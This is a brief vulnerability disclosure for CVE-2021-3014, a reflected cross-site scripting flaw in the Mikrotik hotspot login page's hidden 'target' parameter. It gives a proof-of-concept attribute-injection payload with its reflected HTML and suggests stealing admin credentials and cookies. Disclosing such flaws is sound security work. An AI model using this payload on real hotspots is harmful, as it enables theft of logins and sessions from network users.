Author Mohammed Al-Barbari aka @m4dm0e

CVE-ID: CVE-2021-3014

Summary: There is XSS-Reflected at the Mikrotik hotspot login page.

image

Description: In the hotspot login page there is hidden input called target with a blank value so you can add any value into it just by adding a new parameter with the value you want and it will be reflected in the page source e.g: c.net/login?target=HelloAll

source code :

<input type="text" name="target" value="HelloAll" />

but also there are no filters over there so, you can escape the input tag and start a new value e.g: ?target=hhh" onSubmit="alert(0)

page source :

<input type="text" name="target" value="hhh" onSubmit="alert(0)" />

after the victim clicks on the submit button the XSS fires!

image

How to exploit this? Well, you have to be in the same network so you can play with this to get the admin user and password or cookies! also the users, with many techniques

PoC There is a POC video that will share as soon as possible on my channel GrodRiket Security